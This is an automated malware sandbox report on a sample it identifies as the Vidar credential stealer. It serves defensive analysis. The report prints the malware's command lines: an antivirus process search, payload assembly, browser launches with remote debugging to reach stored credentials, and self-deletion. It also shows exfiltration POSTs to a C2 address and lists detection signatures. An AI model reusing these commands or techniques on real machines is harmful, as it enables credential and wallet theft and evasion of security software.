Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mNPTwHOuvT.exe

Overview

General Information

Sample name:mNPTwHOuvT.exe
renamed because original name is a hash value
Original sample name:2db319e8bfd0b40bb3ac999cf4e6670c.exe
Analysis ID:1589496
MD5:2db319e8bfd0b40bb3ac999cf4e6670c
SHA1:c339ddf42d76c1a5ee35c3e6f14c6f818cc934f6
SHA256:15a69592874503ccd6542cd58a70e20fac83e7e795505c11b9a379bb005090da
Tags:exeuser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mNPTwHOuvT.exe (PID: 1488 cmdline: "C:\Users\user\Desktop\mNPTwHOuvT.exe" MD5: 2DB319E8BFD0B40BB3AC999CF4E6670C)
    • cmd.exe (PID: 3140 cmdline: "C:\Windows\System32\cmd.exe" /c move Lou Lou.cmd & Lou.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3712 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6220 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5996 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3176 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2516 cmdline: cmd /c md 424372 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6180 cmdline: findstr /V "SYDNEY" Webmasters MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5532 cmdline: cmd /c copy /b ..\Hero + ..\Spell + ..\Pensions + ..\Wants + ..\Mars U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Fine.com (PID: 1440 cmdline: Fine.com U MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 6412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 5836 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2136,i,8109458833846669920,3799157795582322690,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • msedge.exe (PID: 7692 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 7940 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2636,i,9989964858448437683,7276448006416970456,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • cmd.exe (PID: 7976 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HD2DTRQQ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 2472 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 4956 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 7924 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7340 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6204 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3672 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 1164 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5256 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3204 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1136 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "http://www.microsoft.com0", "Botnet": "1402"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: Fine.com PID: 1440JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: Fine.com PID: 1440JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          11.2.Fine.com.4310000.1.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
          • 0x2068c:$str01: MachineID:
          • 0x1f051:$str02: Work Dir: In memory
          • 0x206c3:$str03: [Hardware]
          • 0x20675:$str04: VideoCard:
          • 0x1fce5:$str05: [Processes]
          • 0x1fcf1:$str06: [Software]
          • 0x1f1bb:$str07: information.txt
          • 0x20398:$str08: %s\*
          • 0x203e5:$str08: %s\*
          • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
          • 0x1fb61:$str12: UseMasterPassword
          • 0x206cf:$str13: Soft: WinSCP
          • 0x2016e:$str14: <Pass encoding="base64">
          • 0x206b2:$str15: Soft: FileZilla
          • 0x1f1ad:$str16: passwords.txt
          • 0x1fb8c:$str17: build_id
          • 0x1fc80:$str18: file_data

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Browser Started with Remote Debugging
          Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Fine.com U, ParentImage: C:\Users\user\AppData\Local\Temp\424372\Fine.com, ParentProcessId: 1440, ParentProcessName: Fine.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 6412, ProcessName: chrome.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sigma detected: Search for Antivirus process
          Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Lou Lou.cmd & Lou.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3140, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3176, ProcessName: findstr.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-12T17:22:43.902166+010020287653Unknown Traffic192.168.2.549851195.201.141.106443TCP
          2025-01-12T17:22:45.079946+010020287653Unknown Traffic192.168.2.549860195.201.141.106443TCP
          2025-01-12T17:22:46.576648+010020287653Unknown Traffic192.168.2.549869195.201.141.106443TCP
          2025-01-12T17:22:47.906794+010020287653Unknown Traffic192.168.2.549880195.201.141.106443TCP
          2025-01-12T17:22:49.276293+010020287653Unknown Traffic192.168.2.549890195.201.141.106443TCP
          2025-01-12T17:22:51.730323+010020287653Unknown Traffic192.168.2.549902195.201.141.106443TCP
          2025-01-12T17:22:51.742293+010020287653Unknown Traffic192.168.2.549901195.201.141.106443TCP
          2025-01-12T17:22:59.824701+010020287653Unknown Traffic192.168.2.549969195.201.141.106443TCP
          2025-01-12T17:23:00.910589+010020287653Unknown Traffic192.168.2.549978195.201.141.106443TCP
          2025-01-12T17:23:01.952740+010020287653Unknown Traffic192.168.2.549988195.201.141.106443TCP
          2025-01-12T17:23:03.498656+010020287653Unknown Traffic192.168.2.549995195.201.141.106443TCP
          2025-01-12T17:23:04.313417+010020287653Unknown Traffic192.168.2.550004195.201.141.106443TCP
          2025-01-12T17:23:10.654868+010020287653Unknown Traffic192.168.2.550043195.201.141.106443TCP
          2025-01-12T17:23:11.873153+010020287653Unknown Traffic192.168.2.550051195.201.141.106443TCP
          2025-01-12T17:23:12.885715+010020287653Unknown Traffic192.168.2.550063195.201.141.106443TCP
          2025-01-12T17:23:13.937567+010020287653Unknown Traffic192.168.2.550074195.201.141.106443TCP
          2025-01-12T17:23:16.216233+010020287653Unknown Traffic192.168.2.550105195.201.141.106443TCP
          2025-01-12T17:23:17.295384+010020287653Unknown Traffic192.168.2.550113195.201.141.106443TCP
          2025-01-12T17:23:19.402979+010020287653Unknown Traffic192.168.2.550115195.201.141.106443TCP
          2025-01-12T17:23:20.736794+010020287653Unknown Traffic192.168.2.550117195.201.141.106443TCP
          2025-01-12T17:23:22.063974+010020287653Unknown Traffic192.168.2.550120195.201.141.106443TCP
          2025-01-12T17:23:23.438444+010020287653Unknown Traffic192.168.2.550124195.201.141.106443TCP
          2025-01-12T17:23:27.518206+010020287653Unknown Traffic192.168.2.550134195.201.141.106443TCP
          2025-01-12T17:23:29.315486+010020287653Unknown Traffic192.168.2.550137195.201.141.106443TCP
          2025-01-12T17:23:30.674100+010020287653Unknown Traffic192.168.2.550142195.201.141.106443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-12T17:22:48.602342+010020442471Malware Command and Control Activity Detected195.201.141.106443192.168.2.549880TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-12T17:22:49.942460+010020518311Malware Command and Control Activity Detected195.201.141.106443192.168.2.549890TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-12T17:22:49.941821+010020490871A Network Trojan was detected192.168.2.549890195.201.141.106443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-12T17:22:45.899918+010028593781Malware Command and Control Activity Detected192.168.2.549860195.201.141.106443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000B.00000002.2935633690.0000000000E90000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://www.microsoft.com0", "Botnet": "1402"}
          Multi AV Scanner detection for submitted file
          Source: mNPTwHOuvT.exeVirustotal: Detection: 58%Perma Link
          Source: mNPTwHOuvT.exeReversingLabs: Detection: 47%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
          Source: mNPTwHOuvT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 195.201.141.106:443 -> 192.168.2.5:49851 version: TLS 1.2
          Source: mNPTwHOuvT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_0023DC54
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0024A087
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0024A1E2
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_0023E472
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_0024A570
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0020C622 FindFirstFileExW,11_2_0020C622
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_002466DC FindFirstFileW,FindNextFileW,FindClose,11_2_002466DC
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00247333 FindFirstFileW,FindClose,11_2_00247333
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_002473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_002473D4
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_0023D921
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\424372\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\424372Jump to behavior
          Source: chrome.exeMemory has grown: Private usage: 5MB later: 39MB

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49890 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49860 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 195.201.141.106:443 -> 192.168.2.5:49880
          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 195.201.141.106:443 -> 192.168.2.5:49890
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://www.microsoft.com0
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 195.201.141.106Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----XBAIMGLN7QIM7YCTJWLNHost: 195.201.141.106Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----89R1NGVKNGVAAAAAAAAIHost: 195.201.141.106Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAI5X4O8YUSRQIW4WL68Host: 195.201.141.106Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----S0HVS2V3W4E3EUK6P89RHost: 195.201.141.106Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----VS0RQIWB1DJM7YUS0R9ZHost: 195.201.141.106Content-Length: 489Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----VS0RQIWB1DJM7YUS0R9ZHost: 195.201.141.106Content-Length: 7373Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----UAS0ZU3EUA1NYMY58GLXHost: 195.201.141.106Content-Length: 505Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----1VSRIWTJM7G47Q90HLN7Host: 195.201.141.106Content-Length: 213453Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----1VSRIWTJM7G47Q90HLN7Host: 195.201.141.106Content-Length: 55081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----VSJECJEC2VAIM79HVAIWHost: 195.201.141.106Content-Length: 142457Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JWT2DT2NGVAAAIEUSR1NHost: 195.201.141.106Content-Length: 493Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBS26PZ58QIMOZU37QHost: 195.201.141.106Content-Length: 3165Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JE3OP8YU3EKF3EU3OZ5PHost: 195.201.141.106Content-Length: 207993Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----US0HLXBAAI5FU3WT000RHost: 195.201.141.106Content-Length: 68733Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----VKNG4E3OZMOZUAAASJ5PHost: 195.201.141.106Content-Length: 262605Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----A1VKFU3EKF3E37900ZM7Host: 195.201.141.106Content-Length: 393697Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----Q1VK6FCJW4E37Q9R9Z5XHost: 195.201.141.106Content-Length: 131557Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----YM7YMOHLXBIEUAIMOP89Host: 195.201.141.106Content-Length: 6990993Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EUSR9ZUKXLNYMY589HL6Host: 195.201.141.106Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BA1VAI58YMYU379R1D26Host: 195.201.141.106Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4WTRQIMYUSJM7YMOHDTRHost: 195.201.141.106Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEUKNOH47GVAAAAIM7GLHost: 195.201.141.106Content-Length: 98165Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCB1VK689RQIEUAIMOPZHost: 195.201.141.106Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----NYC2NO8Q1DJEU3O890R9Host: 195.201.141.106Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 18.244.18.27 18.244.18.27
          Source: Joe Sandbox ViewIP Address: 18.238.49.99 18.238.49.99
          Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
          Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49860 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49851 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49880 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49902 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49890 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49901 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49869 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49969 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49978 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49988 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49995 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50004 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50043 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50051 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50063 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50074 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50105 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50113 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50115 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50117 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50120 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50124 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50134 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50142 -> 195.201.141.106:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50137 -> 195.201.141.106:443
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
